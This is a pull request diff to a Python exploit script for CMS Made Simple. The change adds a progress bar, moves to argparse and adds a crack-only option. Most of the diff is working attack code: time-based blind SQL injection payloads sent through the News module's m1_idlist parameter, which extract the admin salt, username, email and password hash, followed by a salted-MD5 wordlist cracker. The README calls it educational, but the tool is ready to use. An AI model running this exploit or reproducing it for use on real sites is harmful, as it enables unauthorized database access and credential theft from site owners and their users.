### PR TITLE
Crack with progressbar

### DIFF
--- a/README.md
+++ b/README.md
@@ -22,10 +22,15 @@ Options:
   -t TIME, --time=TIME  Time for SQLIi time based attack, default = 1
                         (second). The slower your internet is the larger this
                         number should be.
+  -s salt, --salt=salt  Salt for password hash
+  -p pass, --pass=pass  Password hash
 ```
 
 When you run the script it will pull down the password hash's salt, then the username, then the email, then the password hash letter by letter.
 If it moves on from one of these extracted strings and the string seems short (as it it's around only 3 or 4 characters long), you should exit the program and utilise the `--time` and increase its value.
+
+If you only want to crack the password, you can pass the salt and hash as arguments to the script. The script will then attempt to crack the password using the provided wordlist.
+ex: python3 csm_made_simple_injection.py  -u http://10.10.10.100/cms -t 4 -c -w /usr/share/wordlists/mylist.txt -p xxxxxxxxxxxxxxxxx -s yyyyyyyyyyyyyyy
 
 ## Disclaimer
 This exploit script is provided for educational purposes only. The authors do not promote or endorse any unauthorized use or exploitation of vulnerabilities. The responsibility for any illegal or unethical use of this script lies solely with the user.

--- a/csm_made_simple_injection.py
+++ b/csm_made_simple_injection.py
@@ -14,71 +14,91 @@ import requests
 from termcolor import colored
 import time
 from termcolor import cprint
-import optparse
+import argparse
 import hashlib
+from tqdm import tqdm
 
-parser = optparse.OptionParser()
-parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
-parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
-parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
-parser.add_option('-t', '--time', action="store", dest='time', type=int, help="Time for SQLIi time based attack, default = 1 (second). The slower your internet is the larger this number should be.", default=1)
+parser = argparse.ArgumentParser()
+parser.add_argument('-u', '--url', type=str, help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_argument('-w', '--wordlist', type=str, help="Wordlist for crack admin password")
+parser.add_argument('-c', '--crack', action="store_true", help="Crack password with wordlist", default=False)
+parser.add_argument('-t', '--time', type=int, help="Time for SQLIi time based attack, default = 1 (second). The slower your internet is the larger this number should be.", default=1)
+parser.add_argument("-s", "--salt", type=str, help="Salt for the password cracking")
+parser.add_argument("-p", "--password", type=str, help="Password hash to crack")
 
-options, args = parser.parse_args()
-if not options.url:
-    print ("[+] Specify an url target")
-    print ("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
-    print ("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
-    print ("[+] Example usage (with 5 second wait selected): exploit.py -u http://target-uri -t 5")
+options = parser.parse_args()
+if not options.url and (not options.password or not options.salt):
+    print("[+] Specify an url target")
+    print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
+    print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
+    print("[+] Example usage (with 5 second wait selected): exploit.py -u http://target-uri -t 5")
     exit()
 
-url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
+if options.url:
+    url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
 session = requests.Session()
 dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
 flag = True
-password = ""
+password = options.password if options.password else ""
 temp_password = ""
 TIME = options.time
 db_name = ""
 output = ""
 email = ""
 
-salt = ''
+salt = options.salt if options.salt else ""
 wordlist = ""
 if options.wordlist:
     wordlist += options.wordlist
+
 
 def crack_password():
     global password
     global output
     global wordlist
     global salt
-    encodings = ['utf-8', 'latin-1', 'ascii']
+    encodings = ["utf-8", "latin-1", "ascii"]
+
+    def process_lines(wordlist_lines, progress):
+        global output
+        for line in wordlist_lines:
+            line = line.strip()
+            encoded_line = (str(salt) + line).encode("utf-8")
+            if hashlib.md5(encoded_line).hexdigest() == password:
+                output += "\n[+] Password cracked: " + line
+                progress.close()
+                return True
+            progress.update(1)
+        return False
 
     for encoding in encodings:
-    	try:
-    	    with open(wordlist, 'r', encoding=encoding) as dict:
-            	for line in dict.readlines():
-            	    line = line.replace("\n", "")
-            	    beautify_print_try(line)
-            	    encoded_line = (str(salt) + line).encode('utf-8')
-            	    if hashlib.md5(encoded_line).hexdigest() == password:
-            	        output += "\n[+] Password cracked: " + line
-            	        break
-            	dict.close()
-    	    break
-    	except UnicodeDecodeError:
-    	    continue
+        try:
+            with open(wordlist, "r", encoding=encoding) as dict_file:
+                lines = dict_file.readlines()
+                total_lines = len(lines)
+
+                with tqdm(total=total_lines, desc="Progress", unit="lines") as progress_bar:
+                    if process_lines(lines, progress_bar):
+                        return
+        except UnicodeDecodeError:
+            continue
+        except Exception as e:
+            print(f"Error: {e}")
+            continue
+
 
 def beautify_print_try(value):
     global output
-    print ("\033c")
-    cprint(output,'green', attrs=['bold'])
+    print("\033c")
+    cprint(output, 'green', attrs=['bold'])
     cprint('[*] Try: ' + value, 'red', attrs=['bold'])
+
 
 def beautify_print():
     global output
-    print ("\033c")
-    cprint(output,'green', attrs=['bold'])
+    print("\033c")
+    cprint(output, 'green', attrs=['bold'])
+
 
 def dump_salt():
     global flag
@@ -86,6 +106,7 @@ def dump_salt():
     global output
     ord_salt = ""
     ord_salt_temp = ""
+    temp_salt = ""
     while flag:
         flag = False
         for i in range(0, len(dictionary)):
@@ -95,7 +116,7 @@ def dump_salt():
             payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
             url = url_vuln + "&m1_idlist=" + payload
             start_time = time.time()
-            r = session.get(url)
+            session.get(url)
             elapsed_time = time.time() - start_time
             if elapsed_time >= TIME:
                 flag = True
@@ -106,32 +127,35 @@ def dump_salt():
     flag = True
     output += '\n[+] Salt for password found: ' + salt
 
+
 def dump_password():
     global flag
     global password
     global output
     ord_password = ""
     ord_password_temp = ""
+    temp_pass = ""
     while flag:
         flag = False
         for i in range(0, len(dictionary)):
-            temp_password = password + dictionary[i]
+            temp_pass = password + dictionary[i]
             ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
-            beautify_print_try(temp_password)
+            beautify_print_try(temp_pass)
             payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
             payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
             url = url_vuln + "&m1_idlist=" + payload
             start_time = time.time()
-            r = session.get(url)
+            session.get(url)
             elapsed_time = time.time() - start_time
             if elapsed_time >= TIME:
                 flag = True
                 break
         if flag:
-            password = temp_password
+            password = temp_pass
             ord_password = ord_password_temp
     flag = True
     output += '\n[+] Password found: ' + password
+
 
 def dump_username():
     global flag
@@ -139,6 +163,7 @@ def dump_username():
     global output
     ord_db_name = ""
     ord_db_name_temp = ""
+    temp_db_name = ""
     while flag:
         flag = False
         for i in range(0, len(dictionary)):
@@ -148,7 +173,7 @@ def dump_username():
             payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
             url = url_vuln + "&m1_idlist=" + payload
             start_time = time.time()
-            r = session.get(url)
+            session.get(url)
             elapsed_time = time.time() - start_time
             if elapsed_time >= TIME:
                 flag = True
@@ -159,12 +184,14 @@ def dump_username():
     output += '\n[+] Username found: ' + db_name
     flag = True
 
+
 def dump_email():
     global flag
     global email
     global output
     ord_email = ""
     ord_email_temp = ""
+    temp_email = ""
     while flag:
         flag = False
         for i in range(0, len(dictionary)):
@@ -174,7 +201,7 @@ def dump_email():
             payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
             url = url_vuln + "&m1_idlist=" + payload
             start_time = time.time()
-            r = session.get(url)
+            session.get(url)
             elapsed_time = time.time() - start_time
             if elapsed_time >= TIME:
                 flag = True
@@ -185,13 +212,15 @@ def dump_email():
     output += '\n[+] Email found: ' + email
     flag = True
 
-dump_salt()
-dump_username()
-dump_email()
-dump_password()
 
-if options.cracking:
-    print (colored("[*] Now trying to crack password"))
+if not options.password or not options.salt:
+    dump_salt()
+    dump_username()
+    dump_email()
+    dump_password()
+
+if options.crack:
+    print(colored("[*] Now trying to crack password"))
     crack_password()
 
 beautify_print()

--- a/requirement.txt
+++ b/requirement.txt
@@ -1,0 +1,4 @@
+requests
+termcolor
+hashlib
+tqdm


### PR DESCRIPTION
Use a progress bar instead of logging attempts (much faster).
Replace optparse, which is obsolete, with argparse.
Add an option to only crack passwords.
Clean up the code to make it PEP8-compliant.